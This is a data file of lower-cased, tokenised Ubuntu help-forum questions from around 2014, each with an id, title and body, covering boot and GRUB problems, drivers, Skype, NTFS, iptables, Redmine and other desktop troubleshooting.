506486	backlight keyboard wo n't turn on samsung ativbook 6 ubuntu 14.04	so i have recently installed ubuntu 14.04 and i like it but i ca n't seem to make the back-light keyboard to work . i have search hours for a solution but i ca n't find the script : kbd_brightness ( correct me if it is n't a script ) . is there a way to test if it is there ? or a kind of command center or something were i can change the back-light setting , i do n't know what else to do , everything worked fine on win8 . it 's frustrating to type in the dark . also if it is of any use , i 'm running ubuntu 14.04 on uefi alongside win8.1 , i can turn the keyboard back-light in win8.1 . also , every solution that i have read so far has to do with the kbd_brightness thing witch appears only when i boot from the original usb from were ubuntu was installed , but is n't there when i boot without it . also , i have thought that maybe i could just copy that missing file from the usb boot and replace it , but i do n't know were to put it or if it has any hope of working .
506487	system settings is n't opening	i can click on system settings , however nothing occurs . my output when trying to open it in terminal : unity-control-center libpulsecommon-4.0.so : can not open shared object file : no such file or directory failed to load module : /usr/lib/x86_64-linux-gnu/unity-control-center-1/panels/libsound.so libgl error : could n't dlopen libudev.so.1 or libudev.so.0 , driver detection may be broken . unity-control-center : ../../../../src/loader/loader.c:129 : asserted_dlsym : assertion `result ' failed . aborted ( core dumped )
506488	screwed up partitioning , ca n't boot into live session , grub installed wrong	i am kinda a novice to the whole ubuntu thing so i 'll try to explain my best here . i recently got a lenovo e545 laptop ( i love it by the way ) , with windows 8. having no idea that its impossible to dual boot windows 8 and ubuntu , i attempted to dual boot the 2 with the install ubuntu alongside windows 8 . did n't work so i deleted the ubuntu partition and reallocated it to windows . later i tried again , by manually making partion by selecting `` something else '' . did n't work again , removed the ubuntu partition and reallocated again . so i tried a third time , again using `` something else '' but i noticed something wierd , it appeared that i had been installing the boot loader on the wrong partition . i had been installing it on sda1 , when it appeared it should have been on sda2 , so i installed grub on sda2 . see what i saw before installing ubuntu for the third time . here http : //imgur.com/ofouh7p . tried booting , but got the normal windows boot , didnt think much of it , erased the ubuntu partion and reallocated it to windows again ( can you see a pattern yet ? ) . didnt touch sda2 where i had installed grub . anyhow , i tried live booting into ubuntu to do something , and it booted my disc to grub , where it gave me the option to try ubuntu or install ubuntu , neither of them worked . that wasnt the only problem , i tried to boot from a usb drive instead , and i choose f12 on startup to choose the usb but when i select the usb from the list , it just blinks and goes back to the default one time boot menu , i tried booting the usb as a fdd and a usb hdd . so obviously putting grub on sda2 screwed something up , how can i restore it ?
506489	failed installations	i had failed many times in installing ubuntu . the message for failing installations was `` permission denied and please see the log files `` . it is there solution to my problem ? .
506490	how to upgrade skype from 4.2 to 4.3	i installed skype-ubuntu-precise_4.3.0.37-1_i386.deb from the skype website , but when i start skype , it is still 4.2 , not 4.3 . i 've tried sudo apt-get remove skype , then installing it , but it did n't help . can someone help me ?
506492	how can i run a simple rsync shell script at boot with root ?	i have a shell script that contains a single rsync command to rsync two local directories . i want the script to run at startup/during boot and i ca n't seem to find the solution for this problem . the file is marked as executable . i tried adding it to init.d and symlinking to rc2.d as i have seen suggested elsewhere . i tried running the script as a startup application from gnome , and i 've tried adding it to rc.local . none of these options seem to start the rsync command . how can i achieve my goal of starting this rsync command at startup or during boot with root ?
506498	can ubuntu work with ntfs file system partitions ? ? i mean could it read and write its contents or not ?	i am thinking of switching to ubuntu , , , here are some things that i am concerned about : does ubuntu supports the usage ( read/write ) of previous data ( from windows formatted ntfs drives ) or i have to completely format my hdd to ext3 file system to fully use ubuntu ? ? can ubuntu read and write the format of windows based programs ( e.g office documents with doc , ppt , xls format ) can ubuntu install window based programs , i mean like photoshop , fl studio ? what gaming options does ubuntu provide ? ?
506499	ubuntu goes black after kali tools installation reboot	whenever i try to install kali tools on ubuntu 14.04 lts . i have to reboot and it comes on but it shows a black screen ( no backlight ) . i can open a terminal but i do n't know how to use it . these are the commands i used if it 's needed . sudo passwd root sudo sh -c 'echo `` greeter-show-manual-login=true '' > > /etc/lightdm/lightdm.conf' sudo apt-get install gnome-session-fallback sudo apt-get install gdebi & & sudo apt-get install synaptic how do i fix this ?
506501	run script on system idle	i want to run some servers and whatnot on my machine but i do n't want it to interfere with what i 'm doing ... gaming , research , writing a paper , etc . my thought was to have a script run when the system idles as in when the screen is locked or no users are logged in . the stuff i would be running during idle would be things like a plex server , bitcoin miner or bittorrent . i can start and stop all of these things with something like `` service plexd start/stop '' . any ideas on how i can initiate these commands when the system goes into and comes out of idle ?
506503	a strange problem using ibus input method for chinese	i am trying to use ibus-pinyin to input chinese , but i have a very strange problem , the ibus input method always give me crazy chinese characters , for example , if i type `` zhongwen '' , then , it did n't give me two characters `` zhong '' and `` wen '' as i expected , but gave me “zang ongwen” （脏ongwen） , and i ca n't find any place to chose the characters i want ( of course it gave me a lot of characters to choose , but none of them is i want ) i tried to change the different pinyin method such as double pinyin and others , but all of them gave crazy things like this ( different method gave me different crazy things ) so , could any one can help to figure out what 's going on in my case ? thanks a lot ,
506507	how to remove a package providing a service without stopping the service ?	i currently have the uwsgi package installed . i would like to remove the package but leave the current uwsgi instances running . is this possible ? ( yes , i do realize the service will only continue running until it is stopped or the server restarts . )
506510	what is the difference between terminal , console , shell , and command line ?	what is the difference between terminal , console , shell , and command line ?
506511	xubuntu does not recognize built in webcammacbook 2006	i installed xubuntu on my macbook from 2006 and i cant get the webcam to work . i used cheese and it says device not found
506518	how to delete the package of libpam-smbpass	i 've upgrade to 14.04 from 12.04.4 server . i was using the samba on 12.04.4 server . when i try to login from tty . it appears the following line and ca n't login . ubuntu 14.04 lts tty1 login : password : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory so i can not delete the libpam-smbpass how can i do . do you have any tips . thank you .
506519	problem in accessing ntfs drive : `` the disk contains an unclean file system ''	when i try to access the drive , following problem occurs- error mounting /dev/sda2 at /media/ankur/d0484a98484a7cea : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/ankur/d0484a98484a7cea '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
506520	getting error while trying to login to skype 4.3 in ubuntu 12.04 lts ?	i 'm using ubuntu 12.04 lts on my machine since long . i upgrade the skype from 4.2 to 4.3 and successfully installed after that when i login to skype able to successfully login to skype but skype window flash out from the my screen
506522	error when i install wubi in windows 7	i have downloaded ubuntu-14.04.1-desktop-i386 for 32 bit ( less than 2 gb ram ) and inside iso when i run wubi installer directly showing an error showing in temp file wubi-14.04-rev286 and not installing.i have tried same for ubuntu 12.04 also but same problem persist and an error that is shown in folder wubi-12.04-rev266 temp file.thats why i am unable to install any of ubuntu version.i have urgent need to install it.please someone help ... ..
506524	why is btrfs slower than ext4 , and why would i want to use it in an ubuntu install ?	at this time ( august 2014 ) ; having been following the benchmarks for btrfs on phoronix , ( http : //www.phoronix.com/scan.php ? page=home ) and have been seeing on the aggregate ; slower performance than ext4 ; why is this the case , and why would i ever want to consider installing with btrfs rather than ext4 ?
506525	can not boot into the bootable usb stick on lenovo g470	i want to help my sister to move from windows 7 to linux ubuntu 14.04.1 . when i boot the computer into the bootable usb stick , it just show me : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ↓ then ↓ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- black background with a underline sign winking _________________________________________ | _ | | | | | | | | | | | | | | | | | | | | | _________________________________________ i have tested for ubuntu 14.04 also , i encounter the same problem . = [ i wonder if ubuntu 14.04.1 do not support the hardware of lenovo g470 .
506528	black screen/purple border booting ubuntu 14.04 after replacing nvidia card with integrated intel gma 3000	i 'm not an ubuntu expert , but i 've been using it for quite some time . one of the most difficult things for me to fix are graphics/x/video driver problems . i usually just reinstall everything when there 's an issue since all the data can be brought over , but this time is somewhat different . the old nvidia geforce 6800 card on my dell optiplex 745 gave out , so my only option was to revert back to the integrated graphics , which turns out to be intel graphics media accelerator ( gma ) 3000 . as a result of the change , i 've purged all nvidia drivers and uninstalled them . i 've also installed the intel graphics driver installer and went through . however , it did n't seem like any chances were made . when booting up , i get a black screen with a thin purple border . the only way to boot into the desktop/login screen is going through the grub menu ( pressing shift ) and selecting the recovery mode and selecting resume , a process that takes too long to boot . the other options on the recovery menu ( like dpkg ) did n't work . i suspect it is just something preventing the correct drivers from loading because it is normal through recovery mode options . also , i 've read about the option to edit the commands by adding `` nomodeset '' in the boot entry on grub , but i 'd rather not try those until the problem is identified and fixed . can anyone guide me into fixing this or direct me to where something like this has been solved before ? thanks in advance .
506529	how to prevent my computer from sending multicast requests	i 've installed ubuntu 12.04 and shortly noticed that my internet port has been blocked by internet provider . i contacted technical support and get reported that my computer was sending too many multicast requests . and their automated system blocked my port . i 've disabled avahi-daemon on my computer : executed the command : gksu gedit /etc/default/avahi-daemon and then set the parameter : avahi_daemon_detect_local=0 and saved the file . after that i disabled multicast on my network card : sudo ifconfig eth0 -multicast my question : are those measures enough or i need to do additional steps to prevent my computer from sending multicast requests ?
506535	package skype is not available	i am trying to install skype on ubuntu 14.04 gnome but it gives me `` package skype has no installation candidate ''
506549	why does tor unexpectedly exit every time i open it ?	every time i try to run tor it unexpectedly exits and i get this in my terminal : ( process:28965 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed aug 04 01:38:35.833 [ notice ] tor v0.2.4.21 ( git-f5def645adfb32be ) running on linux with libevent 2.0.21-stable and openssl 1.0.1g . aug 04 01:38:35.833 [ notice ] tor ca n't help you if you use it wrong ! learn how to be safe at https : //www.torproject.org/download/download # warning aug 04 01:38:35.834 [ notice ] read configuration file `` /usr/bin/tor-browser/data/tor/torrc-defaults '' . aug 04 01:38:35.834 [ notice ] read configuration file `` /usr/bin/tor-browser/data/tor/torrc '' . aug 04 01:38:35.836 [ notice ] opening control listener on 127.0.0.1:9151 aug 04 01:38:35.837 [ notice ] disablenetwork is set . tor will not make or accept non-control network connections . shutting down all existing connections . aug 04 01:38:35.837 [ warn ] /usr/bin/tor-browser/data/tor is not owned by this user ( brody , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? aug 04 01:38:35.837 [ warn ] failed to parse/validate config : could n't access/create private data directory `` /usr/bin/tor-browser/data/tor '' aug 04 01:38:35.837 [ err ] reading config failed -- see warnings above . tor browser exited cleanly .
506552	touchpad is not detected in ubuntu 14.04 on acer aspire one ao756	install ubuntu 14.04 and i can not find the touchpad , use the terminal xinput list order , and note that does not detect it , i have looked everywhere to solve it , but several pages say that if the system does not detect it , is the kernel problem how can i fix this problem ? .
506556	how to enable hardware encryption on ssds like samsung 840 evo ?	just got ubuntu 14.04 running on a zotac zbox ci320 . i want to enable the samsung 840 hard ware encryption that comes with this hard drive , but i do n't know how . is there anyone that can help me set this up ? much appreciated .
506558	how can i change the vifm colorscheme ?	i have various themes in ~/.vifm/colors but when i open vifm and try to change the colourscheme using : colo < theme > , it returns : the : colorscheme command is reserved press return to continue
506559	postgresql backup with barman	i 'm trying to backup my server which i created on postgresql ( 9.1 ) . while on my normal user i type `` su barman '' , it asks me barman 's password , i enter the password . on barman 's shell i type `` barman list-server '' but it returns nothing . my server is on the same computer .
506560	how to install package of r ?	how to install the r language interpreter ? what is the package name ? i have tried r , rlang , rlang , rproject etc . but nothing works - neither apt-get nor ubuntu software center found r. is it possible to not included r in the official ubuntu repositories ?
506566	computer slowed down very much	i had a dualboot xubuntu/windows 7 running . yesterday my laptop suddenly got very slow ( tried both os , both very slow in opening applications , booting up and loading web pages ) . i run the memory test which one can choose in the grub menu , which said nothing wrong . i then reinstalled xubuntu 14.04 onto the whole drive and erased the old installations . but still xubuntu takes ages to boot , start applications , load webpages , just like a general slowdown . also it crashes from time to time and videos stop for a few secs every 2-3 minutes . i really appreciate any help on this ! i have a lenovo thinkpad t410 edit : i used the disk utility to check my hardware health as recommended in the comments . i am getting something like ( translated ) `` harddrive is probably going to fail soon ( 43째 c / 109째 f ) '' does that mean that replacing my hard drive would probably solve all my problems ?
506568	configure touchpad	i bought a new laptop and installed ubuntu 14.04 . i can use touchpad and i have synaptics driver installed but i 'm not able to : turn on and off touchpad ( laptop has a function key which does n't work in ubuntu ) configure gestures ( like 2 fingers down to scroll , etc . ) synaptics driver is supposed to be installed , these are installed packages listed : xserver-xorg-input-synaptics-lts-trusty xserver-xorg-input-synaptics the command xinput list lists these devices ( there 's a pointing device but i think is a device of lenovo pointing style , not the touchpad ) : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:400a id=13 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:400e id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ toshiba web camera - fhd id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=12 [ slave keyboard ( 3 ) ] is there any other software missing to be able to configure touchpad and turn it on and off ? thank you
506575	ubuntu 12.04 lts gnome 3 no update manager	it bugs me to always log in to the unity desktop to check for updates and install them . is there any way to get the manager in gnome 3 or is there any specific command line to install the ?
506580	how to configure a password for lightdm vnc connection	i have ubuntu 14.04 , and am using lightdm . i want to login to the machine from another ( windows ) computer using vnc . by using the following /etc/lightdm/lightdm.conf i get a vnc server , but when i try to connect to it i get ( using chrome realvnc or tightvnc client ) an error 'authentication reason : no password configured for vnc auth' [ seatdefaults ] autologin-user= user-seesion=ubuntu greeter-session=unity-greeter allow-guest=false [ xdmcpserver ] enabled=true port=177 [ vncserver ] enabled=true port=5900 width=1360 height=768 depth=24 i have used vncpasswd on the machine to set a password . however this is a password for a specific user ( i think ) . also 'update-alternatives -- list xvnc ' points to : /usr/bin/xvnc /usr/bin/xvnc4
506582	upgrading to new release when previous release reaches end of life	i am using ubuntu 12.10 . since ubuntu 12.10 has reached `` end of life '' i am unable to download and install softwares which i require . when i type the following command in terminal i get the following message . $ do-release-upgrade -d checking for a new ubuntu release your ubuntu release is not supported anymore . for upgrade information , please visit : http : //www.ubuntu.com/releaseendoflife err upgrade tool signature 404 not found [ ip : 91.189.91.13 80 ] err upgrade tool 404 not found [ ip : 91.189.91.13 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'raring.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . the command `` ubuntu-support-status '' gives the following ... ashish @ ashish : ~ $ ubuntu-support-status support status summary of 'ashish ' : you have 1987 packages ( 100.0 % ) that can not/no-longer be downloaded you have 0 packages ( 0.0 % ) that are unsupported run with -- show-unsupported , -- show-supported or -- show-all to see more details can you tell how to upgrade ubuntu 12.10 to ubuntu 14.04 lts or any other version ...
506583	how can you burn an iso image on a usb flash drive using k3b ?	i 'm quite new of ubuntu ... i 'm using ubuntu 14.04 and what i want is to burn a windows iso image on a usb flash drive . now , using the default startup disk creator , seems that it does n't recognize iso images different from ubuntu ( or at least , i try to select the windows iso but nothing really happens ) . then i 've installed k3b but , then again , this time the problem is that it seems to not recognize media different from a cd . i 'm sure that there 's a way to do it with k3b and i 'm just missing it . anybody can help me ?
506586	is there any software like carnac in ubuntu	i 'm using carnac to show the keyboard operation in my windows screen . if there some workshop related with vim usage , this tool useful definitely . however , i will have a vim workshop in ubuntu , i want to know is there any tool in ubuntu like carnac ? thanks in advanced . after investigation , here is keyboard screen-display tools in mac , named keycastr and , keymon ( display keyboard and mouse status ) for linux , it can be downloaded at here
506587	can not boot after 14.04 to 14.04.1 update , but recovery boot works	recovery is the only way i can boot as ubuntu is my only os , i can reinstall , but would rather not . i do not see the point in reinstalling the same os , to get the same issues . whenever i boot up or restart i do n't get a logo or anything , just a backlit black screen . i have to pull power , restart , go to advanced options and select between normal boot which gives same result , and recovery which will work when i click on a couple repair options . i 'm not very technical , and this is my wifes pc , she is not nearly as techy as i am , and i 'm no coder . i seriously need help ... i know nothing about grub . i know nothing about boot options . i have heard of something called nomodeset , and tried it.. nothing works . where can i get the official ubuntu 14.04 lts , not 14.04.1 . 14.04 lts was perfect . i seriously regret the upgrade unless this boot/reboot issue can be solved .
506588	time managment software for ubuntu	i am looking for task management or time managment software for ubunutu with features like free add tasks easily good user interface save task history
506590	deleted ~/.skype but chat history persists	the title says it all ; i deleted the ~/.skype dir , restarted skype , agreed to the t & cs and added my sign-in information , yet my chat history still remains whenever i click any contact i have spoken with . how do i remove chat history ?
506592	two hdd partitions with the same name result in uncertain directories	i 'm running ubuntu 14.04 on a machine that has a lot of hard drives plugged into it . these hard drives have partitions with old os 's which have a lot of key data that i use often . the problem is , i have 2 partitions with the same name , `` main drive '' and `` main drive '' . ubuntu , to differentiate between them , renames one drive to `` main drive1 '' , while keeping the other just `` main drive '' . the problem is , every time i restart ubuntu , it chooses randomly which partition to rename . as a result , any bookmarks or directories that i have in those partitions , do not work , and have to be reconfigured every time i reboot . are there any solutions to this problem ?
506598	captive portal and squid3 transparent mode	http : //aryo.info/labs/captive-portal-using-php-and-iptables.html i did at practice . but squid ( transparent mode should be ) entered in the access.log s pages can not see . i use the following iptables commands . i wonder how pages should appear in the access log ? iptables -t nat -a postrouting -o eth0 -j masquerade iptables -t mangle -n internet iptables -t mangle -a prerouting -i eth1 -p tcp-m tcp - dport 80-j internet iptables -t mangle -a prerouting -i eth1 -p tcp-m tcp - dport 3128-j internet iptables -t mangle -a internet -j mark -- set-mark 99 iptables -t nat -a prerouting -i eth1 -p tcp -m mark -- mark 99-m tcp -- dport 80 -j dnat -- to-destination 192.168.2.1 note : eth0 modem jack eth1 local network access
506602	nvidia optimus dual screen setup on tp w520	hi i 'm trying to setup nvidia optimus with driver 331 from xorg-edgers with an external monitor on displayport . tp display resolution : 1920x1080 ext . display resolution : 1920x1200 mirroring mode works now : but when i try to use the extended desktop the desktop and all applications are only stretched to the whole size and mouse interaction is a pain because it does not fit to the viewed desktop : how can i change this behavior ? thx update : with latest release of xorg-edgers it 's fixed
506606	moving grub from hdd to ssd - dualboot windows 8.1 + ubuntu	recently i acquired an ssd and decided to install windows 8.1 and ubuntu on it and use my hdd as data storage . however , i seem to have installed grub onto the hdd and not the ssd , which has not created any problems - both windows and ubuntu work just fine - but i would like to move grub to the ssd , so that if i need to replace my hdd ( clicking ... ) i will not have to format everything and start over . i ran bootinfoscript and the result said `` grub2 ( v1.99 ) is installed in the mbr of /dev/sda '' . my hdd is dev/sda and my ssd is dev/sdb . so how can i do that ? i need to move it completely so that removing the hdd wo n't harm the installation . also , if you would like me to post anymore information just tell me what to do and i will post it .
506609	huge cached memory , mostly freez system : (	i have a problem with system memory cache , i think it is bigger than normals . after 5-10 minute of usage , system become unusable and i must restart my `` asus x451-ca '' laptop . this command ran upon user logged in , firefox runed : free -m total used free shared buffers cached mem : 1821 1552 269 377 34 856 -/+ buffers/cache : 661 1159 swap : 1932 0 1932 and after a while system will freeze : free -m total used free shared buffers cached mem : 1821 1649 172 581 0 632 -/+ buffers/cache : 1015 805 swap : 1932 31 1901 more info : matrix @ matrix-x451ca : ~ $ sysctl vm.swappiness vm.swappiness = 60 matrix @ matrix-x451ca : ~ $ sysctl vm.min_free_kbytes vm.min_free_kbytes = 65536 i want more swap space being used and reduce cached memory . i tried : # sysctl -w vm.swappiness=30 # sysctl -w vm.swappiness=90 # sysctl -w vm.min_free_kbytes=65536 # sysctl -w vm.min_free_kbytes=131072 no changes at all . edit : while system freezes `` kswapd0 '' have most cpu use . i use ubuntu 14.04 with 3.13.0-32 kernel .
506611	can not get jack & guitarix to work with my line6 toneport	ok here is my delima , i am pretty good with ubuntu but when it comes to jack and using my guitar i have struggled with getting this to work ! i am running ubuntu 14.04 and want to use my line 6 toneport gx with guitarix and/or rackarack . i have never found a good tutorial . i just want to play guitar on my linuxbox and not go back to windows . i want to use ardour and play along against backtracks . can anyone help ?
506612	how do i set $ path to factory setting in ubuntu 12.04 lts	i executed this command from terminal : export path=/home/ravinder/java_folder/important_programs/servers/apache-maven-3.2.2/bin and all i have this set under $ path , i want to restore my path to default . please help me with this .
506614	why ca n't i use the 14.10 development apis ?	so i am developing an ubuntu touch app and i am running the devel ( utopic ) channel on my phone , but 14.04 on my pc . i 've changed the manifest to use the 14.10 framework , but when i run it on my phone nothing happens as it 's supposed to : i have this code from the page example on developer.ubuntu.com import qtquick 2.0 import ubuntu.components 1.1 mainview { width : units.gu ( 48 ) height : units.gu ( 60 ) page { title : i18n.tr ( `` example page '' ) label { anchors.centerin : parent text : i18n.tr ( `` hello world ! '' ) } head.actions : [ action { iconname : `` add '' text : i18n.tr ( `` search '' ) } ] } } there 's no icon in the header and i am guessing this is the framework 's fault . what do i do ? note : i changed the iconname from search to add just to test it .
506615	how do i change which application opens xml documents by default ?	i am on 14.04 and want to set a custom application ( subtitleeditor ) to open xml files . this question does not apply to me : how to set default program ? because not matter what i do , the default program to open xml files stays the default browser set by system setings > details > default applications .
506619	ubuntu 14.04 failed to update w : failed to fetch cdrom:	executingsudo apt-get update from terminal gives this output : w : failed to fetch cdrom : //ubuntu 14.04.1 lts trusty tahr - release i386 ( 20140722.2 ) /dists/trusty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 14.04.1 lts trusty tahr - release i386 ( 20140722.2 ) /dists/trusty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . software updater fails too , saying `failed to download repository information . any help appreciated .
506620	alt + shift not work	i use alt + shift to change the language . it is so normal and i have worked with that for a long time . but some days some thing have happen for me . that is alt + shift not work all times . for example i can use it on libreoffice to change the language and also on browses . but on some application it does not work . i do not know why . for example on taskque software , when i want to add my own task and change the language , alt+shift does n't work .
506621	unable to install photoshop on ubuntu	i installed ubuntu 14.04 and latest wine from ubuntu software center , when i try to install photoshop cs6 using wine i receive an error . i checked the `` allow executing file as program '' in photoshop setup ( setup.exe ) '' and tried `` more troubleshooting tips : '' in the error message . error message : installation failed your installation encounter errors **installer failed to initialize . this could be due to a missing file . ** more troubleshooting tips : 1 . restart your computer : 2 . exit all application including startup items , virus checking and firewall software . 3. launch the installer and reinstall your application .
506622	jdk 8 installation from .tar.gz file	i have downloaded jdk-8u11-linux-x64.tar.gz from the oracle website , and i have done gunzip and tar -xf which extracted all the files into a jdk directory ( /usr/local/src/jdk1.8.0_11 ) . now is that it with the installation , or is there anything else i have to do ? i find the src.zip file in the jdk1.8.0_11 directory . do i have to unzip and compile it ?
506623	need help to boot linux ubuntu onto a clean laptop	i 've been strugging to install ubuntu onto an intel core i3 aspire e1-571 . i have moved boot language to legacy as well as created both the boot disk and the run usb file . the errors i keep seeing are : pxe-e61 media test failure pxe-mof exiting broadcom pxe rom
506624	how to execute an .sh file ?	i thought a sudo will work , but it says command not found : sudo : ./etax_ticinopg13_inst_linux.sh : command not found nuc @ nuc : ~/downloads $ ./etax_ticinopg13_inst_linux.sh bash : ./etax_ticinopg13_inst_linux.sh : keine berechtigung nuc @ nuc : ~/downloads $ sudo ./etax_ticinopg13_inst_linux.sh sudo : ./etax_ticinopg13_inst_linux.sh : command not found can anyone help me ?
506627	wellcomm gsm modem unreliable on telkomsel indonesia in ubuntu 14.04	i am using ubuntu 14.04 and a wellcomm modem . i am from indonesia . i have already got `` enable mobile broadband '' in the right corner . here is the problem : every time i enable that option and then choose my provider ( telkomsel ) , it keeps searching and searching , sometimes it connects , sometimes it does n't . i have already used it in windows and it was n't a problem then . note : i have already used sakis , and sometimes it works , but if only i can connect just by simple clicks , that would be wonderful .
506630	old dell is giving me `` no default or ui configuration directive found ! '' when booting from usb	i got dell inspiron 5150 and i can not make wireless work under windows xp so i thought i try linux - i got ubuntu-13.10-desktop-i386.iso image handy so i put in on my usb stick using universal-usb-installer-1.9.5.2.exe then i tried booing and got the subject message . i tried everything that the other post boot failure : no default or ui configuration directive found ! suggested renaming isolinux -- > syslinux ( this is a folder ) isolinux.bin -- > syslinux.bin isolinux.cfg -- > syslinux.cfg formatting the stick as fat/fat16 try entering mboot.c32 -c boot.cfg at the `` boot : '' prompt . trying different usb sticks . i tried to boot slax but it finished fatal error occurred - cant find executable chroot command - i am going to try the latest version of slax now . update so the latest slax slax-english-us-7.0.8-i486.iso is giving me boot : /boot/vesamenu.c32 : not a com32r image . hm the older slax went further in the boot process ... . but it is overwritten now . puppy slack linuxn - slacko-5.7.0-pae.iso - gave me the same error boot : /boot/vesamenu.c32 : not a com32r image any help how to make ubuntu work on this old dell is welcome .
506639	installing ubuntu in free space of extended partition : `` you have not selected any partitions for use as swap space ''	here is a picture of my hdd 's partition table : i wish to install ubuntu in the free space shown in the below picture . however i do n't understand how to configure the installation . i chose the something else option at the installation menu , after which the installation type window was displayed . i selected the free space and pressed the + button beside the change ... . then a window popped up : i want to use the entire space for my ubuntu installation hence did n't make any changes in the size . did n't understand the use as : drop down so i let that be . the only change i made was selecting \ in the mount point . then clicked ok and install . then this box popped up : i did n't understand what to do next , so i quit . please tell me what options i need to select to install ubuntu in that 100gb ( 93.14gb ) of free space . thanks !
506643	how to let redmine update after ubuntu 14.04 upgrade ?	i have not been able to update my redmine . everytime i ran apt-get upgrade , i 'm getting a ruby not found error : setting up redmine ( 2.4.2-1 ) ... dbconfig-common : writing config to /etc/dbconfig-common/redmine/instances/default.conf creating config file /etc/redmine/default/database.yml.new with new version dbconfig-common : flushing administrative password populating database for redmine instance `` default '' . this may take a while . /usr/bin/env : ruby1.8 : no such file or directory error when running rake db : migrate , check database configuration . dpkg : error processing package redmine ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : redmine e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am stuck now . my redmine has stopped working . i have tried to `` redmine '' by linking /usr/bin/ruby1.8 to /usr/bin/ruby , but got stuck with different error . setting up redmine ( 2.4.2-1 ) ... dbconfig-common : writing config to /etc/dbconfig-common/redmine/instances/default.conf creating config file /etc/redmine/default/database.yml.new with new version dbconfig-common : flushing administrative password populating database for redmine instance `` default '' . this may take a while . /usr/lib/ruby/1.9.1/rubygems/dependency.rb:247 : in `to_specs ' : could not find rake ( > = 0 ) amongst [ ] ( gem : :loaderror ) from /usr/lib/ruby/1.9.1/rubygems/dependency.rb:256 : in `to_spec' from /usr/lib/ruby/1.9.1/rubygems.rb:1231 : in `gem' from /usr/local/bin/rake:18 : in ` < main > ' error when running rake db : migrate , check database configuration . dpkg : error processing package redmine ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : redmine e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and then i tried with re-installing ruby1.8 by as suggested in this issue . but i got a different error while installing ruby1.8 . apt-get install ruby1.8 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : redmine-sqlite : depends : ruby-sqlite3 but it is not going to be installed ruby-fcgi : depends : libruby1.9.1 ( > = 1.9.2.0 ) but it is not going to be installed or libruby2.0 ( > = 2.0.0 ) but it is not going to be installed ruby-railties-3.2 : depends : ruby-actionpack-3.2 ( > = 3.2.16 ) but it is not going to be installed depends : ruby-actionmailer-3.2 ( > = 3.2.16 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
506647	juju and openstack provisioning	i 'm new to juju and openstack and currently deploying two- and three-node openstack test environment using juju manual provider . at my first attempt i tried to deploy services to my hosts using -- to key for juju deploy . i realized something is going wrong when juju failed to create relation between keystone and mysql deployed on the same host . to deploy services i used the following syntax : juju deploy keystone -- to 1 juju deploy mysql -- to 1 some googling gave me this question on askubuntu and this guide . so , as i understand , the correct way to deploy services in manual environment is using lxc containers for services being deployed to the same host ( if these services can work in containers , of course ) . although i see such advantages of lxc like service independency and isolation , i still do n't understand why services deployed by juju must be isolated in containers . is it a juju design flaw or temporary solution ? is there any way to deploy a couple of services to the same host without lxc ? i think it can be done by specifying config file for each service being deployed , but this would eliminate nearly all juju `` magic '' and simplicity ...
506648	how to install windows 7 on the same partition as ubuntu 12.04 ie . dual boot ?	i have a dell vostro 3000 series with ubuntu 12.04 pre-installed . i want to keep the ubuntu and install windows 7 ultimate along with it . the partition on which ubuntu is installed is the only one with unused space and every time i try to install windows 7 , it says `` windows can not be installed on this drive . '' and leaves me with the only option of deleting the partition , but i want to keep ubuntu as well .
506650	can not run an executable file in terminal	i have been running my script ./runenb a couple of times . i decided to log the output into a file so i used : ./runenb > output.txt and it works . then i tried again and this time i did ./runenb > output.txt ( notice the space in the second case after > ) . now suddenly when i try to run the script ./runenb or any other script for that matter , terminal just returns to insert mode . myusername @ mycomputer : ~ $ ./runenb myusername @ mycomputer : ~ $ i have restarted my computer multiple times and its still the same . what did i do wrong ? i am new to ubuntu and scripting , this is a bit urgent as i ca n't do anything else without running this script .
